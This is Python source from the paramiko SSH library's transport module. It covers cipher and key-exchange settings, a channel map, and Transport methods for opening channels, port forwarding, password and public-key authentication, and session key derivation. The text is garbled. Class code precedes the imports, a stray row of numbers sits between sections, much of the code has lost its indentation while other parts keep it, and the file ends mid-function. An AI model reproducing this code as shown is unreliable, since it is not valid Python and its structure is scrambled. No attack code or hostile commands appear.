            x = tuple(x)
        if type(x) is not tuple:
            raise TypeError("expected tuple or list")
        # Every requested algorithm must be one the transport knows about.
        recognized = list(getattr(self._transport, orig).keys())
        unknown = [algo for algo in x if algo not in recognized]
        if len(unknown) > 0:
            raise ValueError("unknown cipher")
        setattr(self._transport, name, x)

    @property
    def ciphers(self):
        """Symmetric encryption ciphers"""
        return self._transport._preferred_ciphers

    @ciphers.setter
    def ciphers(self, x):
        self._set("_preferred_ciphers", "_cipher_info", x)

    @property
    def digests(self):
        """Digest (one-way hash) algorithms"""
        return self._transport._preferred_macs

    @digests.setter
    def digests(self, x):
        self._set("_preferred_macs", "_mac_info", x)

    @property
    def key_types(self):
        """Public-key algorithms"""
        return self._transport._preferred_keys

    @key_types.setter
    def key_types(self, x):
        self._set("_preferred_keys", "_key_info", x)

    @property
    def kex(self):
        """Key exchange algorithms"""
        return self._transport._preferred_kex

    @kex.setter
    def kex(self, x):
        self._set("_preferred_kex", "_kex_info", x)

    @property
    def compression(self):
        """Compression algorithms"""
        return self._transport._preferred_compression

    @compression.setter
    def compression(self, x):
        self._set("_preferred_compression", "_compression_info", x)
class ChannelMap(object):
    """Thread-safe mapping of channel id -> `.Channel`.

    Values are held weakly, so an entry vanishes automatically once
    nothing else references the channel.
    """

    def __init__(self):
        # (id -> Channel)
        self._map = weakref.WeakValueDictionary()
        self._lock = threading.Lock()

    def put(self, chanid, chan):
        """Register *chan* under *chanid*, replacing any prior entry."""
        with self._lock:
            self._map[chanid] = chan

    def get(self, chanid):
        """Return the channel registered for *chanid*, or ``None``."""
        with self._lock:
            return self._map.get(chanid, None)

    def delete(self, chanid):
        """Remove *chanid* from the map; unknown ids are ignored."""
        with self._lock:
            try:
                del self._map[chanid]
            except KeyError:
                pass

    def values(self):
        """Return a snapshot list of the currently live channels."""
        with self._lock:
            return list(self._map.values())

    def __len__(self):
        with self._lock:
            return len(self._map)
| 38.330488 | 90 | 0.582854 |
from __future__ import print_function
import os
import socket
import sys
import threading
import time
import weakref
from hashlib import md5, sha1, sha256, sha512
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import algorithms, Cipher, modes
import paramiko
from paramiko import util
from paramiko.auth_handler import AuthHandler
from paramiko.ssh_gss import GSSAuth
from paramiko.channel import Channel
from paramiko.common import (
xffffffff,
cMSG_CHANNEL_OPEN,
cMSG_IGNORE,
cMSG_GLOBAL_REQUEST,
DEBUG,
MSG_KEXINIT,
MSG_IGNORE,
MSG_DISCONNECT,
MSG_DEBUG,
ERROR,
WARNING,
cMSG_UNIMPLEMENTED,
INFO,
cMSG_KEXINIT,
cMSG_NEWKEYS,
MSG_NEWKEYS,
cMSG_REQUEST_SUCCESS,
cMSG_REQUEST_FAILURE,
CONNECTION_FAILED_CODE,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
OPEN_SUCCEEDED,
cMSG_CHANNEL_OPEN_FAILURE,
cMSG_CHANNEL_OPEN_SUCCESS,
MSG_GLOBAL_REQUEST,
MSG_REQUEST_SUCCESS,
MSG_REQUEST_FAILURE,
MSG_CHANNEL_OPEN_SUCCESS,
MSG_CHANNEL_OPEN_FAILURE,
MSG_CHANNEL_OPEN,
MSG_CHANNEL_SUCCESS,
MSG_CHANNEL_FAILURE,
MSG_CHANNEL_DATA,
MSG_CHANNEL_EXTENDED_DATA,
MSG_CHANNEL_WINDOW_ADJUST,
MSG_CHANNEL_REQUEST,
MSG_CHANNEL_EOF,
MSG_CHANNEL_CLOSE,
MIN_WINDOW_SIZE,
MIN_PACKET_SIZE,
MAX_WINDOW_SIZE,
DEFAULT_WINDOW_SIZE,
DEFAULT_MAX_PACKET_SIZE,
HIGHEST_USERAUTH_MESSAGE_ID,
MSG_UNIMPLEMENTED,
MSG_NAMES,
)
from paramiko.compress import ZlibCompressor, ZlibDecompressor
from paramiko.dsskey import DSSKey
from paramiko.ed25519key import Ed25519Key
from paramiko.kex_gex import KexGex, KexGexSHA256
from paramiko.kex_group1 import KexGroup1
from paramiko.kex_group14 import KexGroup14
from paramiko.kex_ecdh_nist import KexNistp256, KexNistp384, KexNistp521
from paramiko.kex_gss import KexGSSGex, KexGSSGroup1, KexGSSGroup14
from paramiko.message import Message
from paramiko.packet import Packetizer, NeedRekeyException
from paramiko.primes import ModulusPack
from paramiko.py3compat import string_types, long, byte_ord, b, input, PY2
from paramiko.rsakey import RSAKey
from paramiko.ecdsakey import ECDSAKey
from paramiko.server import ServerInterface
from paramiko.sftp_client import SFTPClient
from paramiko.ssh_exception import (
SSHException,
BadAuthenticationType,
ChannelException,
ProxyCommandFailure,
)
from paramiko.util import retry_on_signal, ClosingContextManager, clamp_value
_active_threads = []
def _join_lingering_threads():
for thr in _active_threads:
thr.stop_thread()
import atexit
atexit.register(_join_lingering_threads)
class Transport(threading.Thread, ClosingContextManager):
_ENCRYPT = object()
_DECRYPT = object()
_PROTO_ID = "2.0"
_CLIENT_ID = "paramiko_{}".format(paramiko.__version__)
_preferred_ciphers = (
"aes128-ctr",
"aes192-ctr",
"aes256-ctr",
"aes128-cbc",
"aes192-cbc",
"aes256-cbc",
"blowfish-cbc",
"3des-cbc",
)
_preferred_macs = (
"hmac-sha2-256",
"hmac-sha2-512",
"hmac-sha1",
"hmac-md5",
"hmac-sha1-96",
"hmac-md5-96",
)
_preferred_keys = (
"ssh-ed25519",
"ecdsa-sha2-nistp256",
"ecdsa-sha2-nistp384",
"ecdsa-sha2-nistp521",
"ssh-rsa",
"ssh-dss",
)
_preferred_kex = (
"ecdh-sha2-nistp256",
"ecdh-sha2-nistp384",
"ecdh-sha2-nistp521",
"diffie-hellman-group-exchange-sha256",
"diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1",
)
_preferred_gsskex = (
"gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==",
"gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==",
"gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==",
)
_preferred_compression = ("none",)
_cipher_info = {
"aes128-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 16,
},
"aes192-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 24,
},
"aes256-ctr": {
"class": algorithms.AES,
"mode": modes.CTR,
"block-size": 16,
"key-size": 32,
},
"blowfish-cbc": {
"class": algorithms.Blowfish,
"mode": modes.CBC,
"block-size": 8,
"key-size": 16,
},
"aes128-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 16,
},
"aes192-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 24,
},
"aes256-cbc": {
"class": algorithms.AES,
"mode": modes.CBC,
"block-size": 16,
"key-size": 32,
},
"3des-cbc": {
"class": algorithms.TripleDES,
"mode": modes.CBC,
"block-size": 8,
"key-size": 24,
},
}
_mac_info = {
"hmac-sha1": {"class": sha1, "size": 20},
"hmac-sha1-96": {"class": sha1, "size": 12},
"hmac-sha2-256": {"class": sha256, "size": 32},
"hmac-sha2-512": {"class": sha512, "size": 64},
"hmac-md5": {"class": md5, "size": 16},
"hmac-md5-96": {"class": md5, "size": 12},
}
_key_info = {
"ssh-rsa": RSAKey,
"ssh-rsa-cert-v01@openssh.com": RSAKey,
"ssh-dss": DSSKey,
"ssh-dss-cert-v01@openssh.com": DSSKey,
"ecdsa-sha2-nistp256": ECDSAKey,
"ecdsa-sha2-nistp256-cert-v01@openssh.com": ECDSAKey,
"ecdsa-sha2-nistp384": ECDSAKey,
"ecdsa-sha2-nistp384-cert-v01@openssh.com": ECDSAKey,
"ecdsa-sha2-nistp521": ECDSAKey,
"ecdsa-sha2-nistp521-cert-v01@openssh.com": ECDSAKey,
"ssh-ed25519": Ed25519Key,
"ssh-ed25519-cert-v01@openssh.com": Ed25519Key,
}
_kex_info = {
"diffie-hellman-group1-sha1": KexGroup1,
"diffie-hellman-group14-sha1": KexGroup14,
"diffie-hellman-group-exchange-sha1": KexGex,
"diffie-hellman-group-exchange-sha256": KexGexSHA256,
"gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup1,
"gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup14,
"gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGex,
"ecdh-sha2-nistp256": KexNistp256,
"ecdh-sha2-nistp384": KexNistp384,
"ecdh-sha2-nistp521": KexNistp521,
}
_compression_info = {
"zlib@openssh.com": (ZlibCompressor, ZlibDecompressor),
"zlib": (ZlibCompressor, ZlibDecompressor),
"none": (None, None),
}
_modulus_pack = None
_active_check_timeout = 0.1
def __init__(
self,
sock,
default_window_size=DEFAULT_WINDOW_SIZE,
default_max_packet_size=DEFAULT_MAX_PACKET_SIZE,
gss_kex=False,
gss_deleg_creds=True,
):
self.active = False
self.hostname = None
if isinstance(sock, string_types):
# convert "host:port" into (host, port)
hl = sock.split(":", 1)
self.hostname = hl[0]
if len(hl) == 1:
sock = (hl[0], 22)
else:
sock = (hl[0], int(hl[1]))
if type(sock) is tuple:
# connect to the given (host, port)
hostname, port = sock
self.hostname = hostname
reason = "No suitable address family"
addrinfos = socket.getaddrinfo(
hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM
)
for family, socktype, proto, canonname, sockaddr in addrinfos:
if socktype == socket.SOCK_STREAM:
af = family
# addr = sockaddr
sock = socket.socket(af, socket.SOCK_STREAM)
try:
retry_on_signal(lambda: sock.connect((hostname, port)))
except socket.error as e:
reason = str(e)
else:
break
else:
raise SSHException(
"Unable to connect to {}: {}".format(hostname, reason)
)
# okay, normal socket-ish flow here...
threading.Thread.__init__(self)
self.setDaemon(True)
self.sock = sock
# we set the timeout so we can check self.active periodically to
# see if we should bail. socket.timeout exception is never propagated.
self.sock.settimeout(self._active_check_timeout)
# negotiated crypto parameters
self.packetizer = Packetizer(sock)
self.local_version = "SSH-" + self._PROTO_ID + "-" + self._CLIENT_ID
self.remote_version = ""
self.local_cipher = self.remote_cipher = ""
self.local_kex_init = self.remote_kex_init = None
self.local_mac = self.remote_mac = None
self.local_compression = self.remote_compression = None
self.session_id = None
self.host_key_type = None
self.host_key = None
# GSS-API / SSPI Key Exchange
self.use_gss_kex = gss_kex
# This will be set to True if GSS-API Key Exchange was performed
self.gss_kex_used = False
self.kexgss_ctxt = None
self.gss_host = None
if self.use_gss_kex:
self.kexgss_ctxt = GSSAuth("gssapi-keyex", gss_deleg_creds)
self._preferred_kex = self._preferred_gsskex + self._preferred_kex
# state used during negotiation
self.kex_engine = None
self.H = None
self.K = None
self.initial_kex_done = False
self.in_kex = False
self.authenticated = False
self._expected_packet = tuple()
# synchronization (always higher level than write_lock)
self.lock = threading.Lock()
# tracking open channels
self._channels = ChannelMap()
self.channel_events = {} # (id -> Event)
self.channels_seen = {} # (id -> True)
self._channel_counter = 0
self.default_max_packet_size = default_max_packet_size
self.default_window_size = default_window_size
self._forward_agent_handler = None
self._x11_handler = None
self._tcp_handler = None
self.saved_exception = None
self.clear_to_send = threading.Event()
self.clear_to_send_lock = threading.Lock()
self.clear_to_send_timeout = 30.0
self.log_name = "paramiko.transport"
self.logger = util.get_logger(self.log_name)
self.packetizer.set_log(self.logger)
self.auth_handler = None
# response Message from an arbitrary global request
self.global_response = None
# user-defined event callbacks
self.completion_event = None
# how long (seconds) to wait for the SSH banner
self.banner_timeout = 15
# how long (seconds) to wait for the handshake to finish after SSH
# banner sent.
self.handshake_timeout = 15
# how long (seconds) to wait for the auth response.
self.auth_timeout = 30
# server mode:
self.server_mode = False
self.server_object = None
self.server_key_dict = {}
self.server_accepts = []
self.server_accept_cv = threading.Condition(self.lock)
self.subsystem_table = {}
def __repr__(self):
id_ = hex(long(id(self)) & xffffffff)
out = "<paramiko.Transport at {}".format(id_)
if not self.active:
out += " (unconnected)"
else:
if self.local_cipher != "":
out += " (cipher {}, {:d} bits)".format(
self.local_cipher,
self._cipher_info[self.local_cipher]["key-size"] * 8,
)
if self.is_authenticated():
out += " (active; {} open channel(s))".format(
len(self._channels)
)
elif self.initial_kex_done:
out += " (connected; awaiting auth)"
else:
out += " (connecting)"
out += ">"
return out
def atfork(self):
self.sock.close()
self.close()
def get_security_options(self):
return SecurityOptions(self)
def set_gss_host(self, gss_host, trust_dns=True, gssapi_requested=True):
# No GSSAPI in play == nothing to do
if not gssapi_requested:
return
# Obtain the correct host first - did user request a GSS-specific name
# to use that is distinct from the actual SSH target hostname?
if gss_host is None:
gss_host = self.hostname
# Finally, canonicalize via DNS if DNS is trusted.
if trust_dns and gss_host is not None:
gss_host = socket.getfqdn(gss_host)
# And set attribute for reference later.
self.gss_host = gss_host
def start_client(self, event=None, timeout=None):
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
max_time = time.time() + timeout if timeout is not None else None
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if event.is_set() or (
timeout is not None and time.time() >= max_time
):
break
def start_server(self, event=None, server=None):
if server is None:
server = ServerInterface()
self.server_mode = True
self.server_object = server
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if event.is_set():
break
def add_server_key(self, key):
self.server_key_dict[key.get_name()] = key
def get_server_key(self):
try:
return self.server_key_dict[self.host_key_type]
except KeyError:
pass
return None
@staticmethod
def load_server_moduli(filename=None):
Transport._modulus_pack = ModulusPack()
# places to look for the openssh "moduli" file
file_list = ["/etc/ssh/moduli", "/usr/local/etc/moduli"]
if filename is not None:
file_list.insert(0, filename)
for fn in file_list:
try:
Transport._modulus_pack.read_file(fn)
return True
except IOError:
pass
# none succeeded
Transport._modulus_pack = None
return False
def close(self):
if not self.active:
return
self.stop_thread()
for chan in list(self._channels.values()):
chan._unlink()
self.sock.close()
def get_remote_server_key(self):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
return self.host_key
def is_active(self):
return self.active
def open_session(
self, window_size=None, max_packet_size=None, timeout=None
):
return self.open_channel(
"session",
window_size=window_size,
max_packet_size=max_packet_size,
timeout=timeout,
)
def open_x11_channel(self, src_addr=None):
return self.open_channel("x11", src_addr=src_addr)
def open_forward_agent_channel(self):
return self.open_channel("auth-agent@openssh.com")
def open_forwarded_tcpip_channel(self, src_addr, dest_addr):
return self.open_channel("forwarded-tcpip", dest_addr, src_addr)
    def open_channel(
        self,
        kind,
        dest_addr=None,
        src_addr=None,
        window_size=None,
        max_packet_size=None,
        timeout=None,
    ):
        """Request a new channel of the given ``kind`` ("session",
        "forwarded-tcpip", "direct-tcpip" or "x11") and block until it is
        opened or ``timeout`` seconds (default 3600) pass.

        :return: the new `Channel`
        :raises SSHException: if the session is inactive, the server
            rejects the open, or the open times out.
        """
        if not self.active:
            raise SSHException("SSH session not active")
        timeout = 3600 if timeout is None else timeout
        # hold the lock while allocating the channel id and registering the
        # channel, so the reader thread sees a consistent table
        self.lock.acquire()
        try:
            window_size = self._sanitize_window_size(window_size)
            max_packet_size = self._sanitize_packet_size(max_packet_size)
            chanid = self._next_channel()
            m = Message()
            m.add_byte(cMSG_CHANNEL_OPEN)
            m.add_string(kind)
            m.add_int(chanid)
            m.add_int(window_size)
            m.add_int(max_packet_size)
            # tcpip channels carry both endpoints; x11 only the originator
            if (kind == "forwarded-tcpip") or (kind == "direct-tcpip"):
                m.add_string(dest_addr[0])
                m.add_int(dest_addr[1])
                m.add_string(src_addr[0])
                m.add_int(src_addr[1])
            elif kind == "x11":
                m.add_string(src_addr[0])
                m.add_int(src_addr[1])
            chan = Channel(chanid)
            self._channels.put(chanid, chan)
            self.channel_events[chanid] = event = threading.Event()
            self.channels_seen[chanid] = True
            chan._set_transport(self)
            chan._set_window(window_size, max_packet_size)
        finally:
            self.lock.release()
        self._send_user_message(m)
        start_ts = time.time()
        # the event fires on both success and failure replies
        while True:
            event.wait(0.1)
            if not self.active:
                e = self.get_exception()
                if e is None:
                    e = SSHException("Unable to open channel.")
                raise e
            if event.is_set():
                break
            elif start_ts + timeout < time.time():
                raise SSHException("Timeout opening channel.")
        # on failure the reader thread removed the channel from the table
        chan = self._channels.get(chanid)
        if chan is not None:
            return chan
        e = self.get_exception()
        if e is None:
            e = SSHException("Unable to open channel.")
        raise e
    def request_port_forward(self, address, port, handler=None):
        """Ask the server to forward TCP connections arriving at
        ``address:port`` on the server back over this transport
        ("tcpip-forward" global request).

        If ``port`` is 0 the server picks a port, which is returned.  If
        ``handler`` is omitted, incoming channels are queued for `accept`.

        :return: the port the server is listening on
        :raises SSHException: if the session is inactive or the server
            denies the request.
        """
        if not self.active:
            raise SSHException("SSH session not active")
        port = int(port)
        response = self.global_request(
            "tcpip-forward", (address, port), wait=True
        )
        if response is None:
            raise SSHException("TCP forwarding request denied")
        if port == 0:
            # server chose a port for us; it's in the reply
            port = response.get_int()
        if handler is None:
            def default_handler(channel, src_addr, dest_addr_port):
                # src_addr, src_port = src_addr_port
                # dest_addr, dest_port = dest_addr_port
                self._queue_incoming_channel(channel)
            handler = default_handler
        self._tcp_handler = handler
        return port
def cancel_port_forward(self, address, port):
if not self.active:
return
self._tcp_handler = None
self.global_request("cancel-tcpip-forward", (address, port), wait=True)
def open_sftp_client(self):
return SFTPClient.from_transport(self)
def send_ignore(self, byte_count=None):
m = Message()
m.add_byte(cMSG_IGNORE)
if byte_count is None:
byte_count = (byte_ord(os.urandom(1)) % 32) + 10
m.add_bytes(os.urandom(byte_count))
self._send_user_message(m)
    def renegotiate_keys(self):
        """Force a new key exchange on the open session and block until it
        completes.

        :raises SSHException: if negotiation fails or the session dies.
        """
        self.completion_event = threading.Event()
        self._send_kex_init()
        while True:
            self.completion_event.wait(0.1)
            if not self.active:
                e = self.get_exception()
                if e is not None:
                    raise e
                raise SSHException("Negotiation failed.")
            if self.completion_event.is_set():
                break
        return
def set_keepalive(self, interval):
def _request(x=weakref.proxy(self)):
return x.global_request("keepalive@lag.net", wait=False)
self.packetizer.set_keepalive(interval, _request)
    def global_request(self, kind, data=None, wait=True):
        """Send a MSG_GLOBAL_REQUEST of the given ``kind`` with optional
        extra ``data`` fields.

        When ``wait`` is true, block for the server's reply and return the
        response `Message` (or None on denial / dead session); otherwise
        fire-and-forget and return None.
        """
        if wait:
            self.completion_event = threading.Event()
        m = Message()
        m.add_byte(cMSG_GLOBAL_REQUEST)
        m.add_string(kind)
        m.add_boolean(wait)
        if data is not None:
            m.add(*data)
        self._log(DEBUG, 'Sending global request "{}"'.format(kind))
        self._send_user_message(m)
        if not wait:
            return None
        while True:
            self.completion_event.wait(0.1)
            if not self.active:
                return None
            if self.completion_event.is_set():
                break
        # filled in by _parse_request_success / _parse_request_failure
        return self.global_response
    def accept(self, timeout=None):
        """Return the next channel opened by the client over this transport
        (server mode), waiting up to ``timeout`` seconds.

        :return: a new `Channel`, or None on timeout.
        """
        self.lock.acquire()
        try:
            if len(self.server_accepts) > 0:
                chan = self.server_accepts.pop(0)
            else:
                # wait for _queue_incoming_channel to notify; re-check the
                # queue afterwards since wait() can also time out
                self.server_accept_cv.wait(timeout)
                if len(self.server_accepts) > 0:
                    chan = self.server_accepts.pop(0)
                else:
                    # timeout
                    chan = None
        finally:
            self.lock.release()
        return chan
    def connect(
        self,
        hostkey=None,
        username="",
        password=None,
        pkey=None,
        gss_host=None,
        gss_auth=False,
        gss_kex=False,
        gss_deleg_creds=True,
        gss_trust_dns=True,
    ):
        """Negotiate a session, verify the server's host key (if given),
        then authenticate.

        Auth method is chosen in order: GSS-API with-mic, GSS-API keyex,
        public key (``pkey``), password.  No auth is attempted if none of
        ``pkey``/``password``/``gss_auth``/``gss_kex`` are supplied.

        :raises SSHException: on negotiation failure, bad host key, or
            authentication failure.
        """
        if hostkey is not None:
            # constrain negotiation to the type of the expected host key
            self._preferred_keys = [hostkey.get_name()]
        self.set_gss_host(
            gss_host=gss_host,
            trust_dns=gss_trust_dns,
            gssapi_requested=gss_kex or gss_auth,
        )
        self.start_client()
        # check host key if we were given one
        # If GSS-API Key Exchange was performed, we are not required to check
        # the host key.
        if (hostkey is not None) and not gss_kex:
            key = self.get_remote_server_key()
            if (
                key.get_name() != hostkey.get_name()
                or key.asbytes() != hostkey.asbytes()
            ):
                self._log(DEBUG, "Bad host key from server")
                self._log(
                    DEBUG,
                    "Expected: {}: {}".format(
                        hostkey.get_name(), repr(hostkey.asbytes())
                    ),
                )
                self._log(
                    DEBUG,
                    "Got      : {}: {}".format(
                        key.get_name(), repr(key.asbytes())
                    ),
                )
                raise SSHException("Bad host key from server")
            self._log(
                DEBUG, "Host key verified ({})".format(hostkey.get_name())
            )
        if (pkey is not None) or (password is not None) or gss_auth or gss_kex:
            if gss_auth:
                self._log(
                    DEBUG, "Attempting GSS-API auth... (gssapi-with-mic)"
                )  # noqa
                self.auth_gssapi_with_mic(
                    username, self.gss_host, gss_deleg_creds
                )
            elif gss_kex:
                self._log(DEBUG, "Attempting GSS-API auth... (gssapi-keyex)")
                self.auth_gssapi_keyex(username)
            elif pkey is not None:
                self._log(DEBUG, "Attempting public-key auth...")
                self.auth_publickey(username, pkey)
            else:
                self._log(DEBUG, "Attempting password auth...")
                self.auth_password(username, password)
        return
def get_exception(self):
self.lock.acquire()
try:
e = self.saved_exception
self.saved_exception = None
return e
finally:
self.lock.release()
def set_subsystem_handler(self, name, handler, *larg, **kwarg):
try:
self.lock.acquire()
self.subsystem_table[name] = (handler, larg, kwarg)
finally:
self.lock.release()
def is_authenticated(self):
return (
self.active
and self.auth_handler is not None
and self.auth_handler.is_authenticated()
)
def get_username(self):
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.get_username()
def get_banner(self):
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.banner
def auth_none(self, username):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_none(username, my_event)
return self.auth_handler.wait_for_response(my_event)
    def auth_password(self, username, password, event=None, fallback=True):
        """Authenticate with a password.

        If ``event`` is given, return immediately (empty list) and let the
        caller poll the event; otherwise block for the result.  When
        ``fallback`` is true and the server only offers
        "keyboard-interactive", retry via that method, answering a single
        prompt with the same password.

        :return: list of auth types usable for continuation.
        :raises SSHException: on failure or missing session.
        """
        if (not self.active) or (not self.initial_kex_done):
            # we should never try to send the password unless we're on a secure
            # link
            raise SSHException("No existing session")
        if event is None:
            my_event = threading.Event()
        else:
            my_event = event
        self.auth_handler = AuthHandler(self)
        self.auth_handler.auth_password(username, password, my_event)
        if event is not None:
            # caller wants to wait for event themselves
            return []
        try:
            return self.auth_handler.wait_for_response(my_event)
        except BadAuthenticationType as e:
            # try to fudge it
            if not fallback or ("keyboard-interactive" not in e.allowed_types):
                raise
            try:
                def handler(title, instructions, fields):
                    if len(fields) > 1:
                        raise SSHException("Fallback authentication failed.")
                    if len(fields) == 0:
                        # for some reason, at least on os x, a 2nd request will
                        # be made with zero fields requested. maybe it's just
                        # to clear the screen; answer with nothing
                        return []
                    return [password]
                return self.auth_interactive(username, handler)
            except SSHException:
                # attempt failed; just raise the original exception
                raise e
def auth_publickey(self, username, key, event=None):
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_publickey(username, key, my_event)
if event is not None:
return []
return self.auth_handler.wait_for_response(my_event)
def auth_interactive(self, username, handler, submethods=""):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_interactive(
username, handler, my_event, submethods
)
return self.auth_handler.wait_for_response(my_event)
def auth_interactive_dumb(self, username, handler=None, submethods=""):
if not handler:
def handler(title, instructions, prompt_list):
answers = []
if title:
print(title.strip())
if instructions:
print(instructions.strip())
for prompt, show_input in prompt_list:
print(prompt.strip(), end=" ")
answers.append(input())
return answers
return self.auth_interactive(username, handler, submethods)
def auth_gssapi_with_mic(self, username, gss_host, gss_deleg_creds):
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_with_mic(
username, gss_host, gss_deleg_creds, my_event
)
return self.auth_handler.wait_for_response(my_event)
def auth_gssapi_keyex(self, username):
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_keyex(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def set_log_channel(self, name):
self.log_name = name
self.logger = util.get_logger(name)
self.packetizer.set_log(self.logger)
def get_log_channel(self):
return self.log_name
def set_hexdump(self, hexdump):
self.packetizer.set_hexdump(hexdump)
def get_hexdump(self):
return self.packetizer.get_hexdump()
def use_compression(self, compress=True):
if compress:
self._preferred_compression = ("zlib@openssh.com", "zlib", "none")
else:
self._preferred_compression = ("none",)
def getpeername(self):
gp = getattr(self.sock, "getpeername", None)
if gp is None:
return "unknown", 0
return gp()
    def stop_thread(self):
        """Deactivate the transport and wait for its reader thread to
        exit (with a workaround for threads stuck in socket reads)."""
        self.active = False
        self.packetizer.close()
        if PY2:
            # Original join logic; #520 doesn't appear commonly present under
            # Python 2.
            while self.is_alive() and self is not threading.current_thread():
                self.join(10)
        else:
            # Keep re-joining briefly until the thread exits, or until it
            # looks like we hit issue #520 (a socket.recv
            # race condition preventing it from timing out correctly), wherein
            # our socket and packetizer are both closed (but where we'd
            # otherwise block in join() forever).
            while (
                self.is_alive()
                and self is not threading.current_thread()
                and not self.sock._closed
                and not self.packetizer.closed
            ):
                self.join(0.1)
def _log(self, level, msg, *args):
if issubclass(type(msg), list):
for m in msg:
self.logger.log(level, m)
else:
self.logger.log(level, msg, *args)
def _get_modulus_pack(self):
return self._modulus_pack
def _next_channel(self):
chanid = self._channel_counter
while self._channels.get(chanid) is not None:
self._channel_counter = (self._channel_counter + 1) & 0xffffff
chanid = self._channel_counter
self._channel_counter = (self._channel_counter + 1) & 0xffffff
return chanid
def _unlink_channel(self, chanid):
self._channels.delete(chanid)
def _send_message(self, data):
self.packetizer.send_message(data)
    def _send_user_message(self, data):
        """Send a user-level packet, waiting out any in-progress key
        re-exchange.

        Outbound user traffic is gated on ``clear_to_send``, which is
        cleared during kex; raises SSHException if the rekey doesn't
        finish within ``clear_to_send_timeout`` seconds.
        """
        start = time.time()
        while True:
            self.clear_to_send.wait(0.1)
            if not self.active:
                self._log(
                    DEBUG, "Dropping user packet because connection is dead."
                )
                return
            self.clear_to_send_lock.acquire()
            if self.clear_to_send.is_set():
                # break with the lock still held so the flag cannot be
                # cleared between this check and the send below
                break
            self.clear_to_send_lock.release()
            if time.time() > start + self.clear_to_send_timeout:
                raise SSHException(
                    "Key-exchange timed out waiting for key negotiation"
                )
        try:
            self._send_message(data)
        finally:
            # release the lock taken before the break above
            self.clear_to_send_lock.release()
def _set_K_H(self, k, h):
self.K = k
self.H = h
if self.session_id is None:
self.session_id = h
def _expect_packet(self, *ptypes):
self._expected_packet = tuple(ptypes)
def _verify_key(self, host_key, sig):
key = self._key_info[self.host_key_type](Message(host_key))
if key is None:
raise SSHException("Unknown host key type")
if not key.verify_ssh_sig(self.H, Message(sig)):
raise SSHException(
"Signature verification ({}) failed.".format(
self.host_key_type
)
)
self.host_key = key
    def _compute_key(self, id, nbytes):
        """Derive ``nbytes`` of key material for key letter ``id``
        ('A'..'F'), per RFC 4253 section 7.2.

        Initial block is HASH(K || H || id || session_id); output is
        extended by hashing K || H || output-so-far until long enough.
        """
        m = Message()
        m.add_mpint(self.K)
        m.add_bytes(self.H)
        m.add_byte(b(id))
        m.add_bytes(self.session_id)
        # the hash algorithm comes from the kex engine; fall back to sha1
        # for engines that don't declare one
        hash_algo = getattr(self.kex_engine, "hash_algo", None)
        hash_select_msg = "kex engine {} specified hash_algo {!r}".format(
            self.kex_engine.__class__.__name__, hash_algo
        )
        if hash_algo is None:
            hash_algo = sha1
            hash_select_msg += ", falling back to sha1"
        if not hasattr(self, "_logged_hash_selection"):
            # only log the hash selection once per transport
            self._log(DEBUG, hash_select_msg)
            setattr(self, "_logged_hash_selection", True)
        out = sofar = hash_algo(m.asbytes()).digest()
        while len(out) < nbytes:
            m = Message()
            m.add_mpint(self.K)
            m.add_bytes(self.H)
            m.add_bytes(sofar)
            digest = hash_algo(m.asbytes()).digest()
            out += digest
            sofar += digest
        return out[:nbytes]
def _get_cipher(self, name, key, iv, operation):
if name not in self._cipher_info:
raise SSHException("Unknown client cipher " + name)
else:
cipher = Cipher(
self._cipher_info[name]["class"](key),
self._cipher_info[name]["mode"](iv),
backend=default_backend(),
)
if operation is self._ENCRYPT:
return cipher.encryptor()
else:
return cipher.decryptor()
def _set_forward_agent_handler(self, handler):
if handler is None:
def default_handler(channel):
self._queue_incoming_channel(channel)
self._forward_agent_handler = default_handler
else:
self._forward_agent_handler = handler
def _set_x11_handler(self, handler):
# only called if a channel has turned on x11 forwarding
if handler is None:
# by default, use the same mechanism as accept()
def default_handler(channel, src_addr_port):
self._queue_incoming_channel(channel)
self._x11_handler = default_handler
else:
self._x11_handler = handler
def _queue_incoming_channel(self, channel):
self.lock.acquire()
try:
self.server_accepts.append(channel)
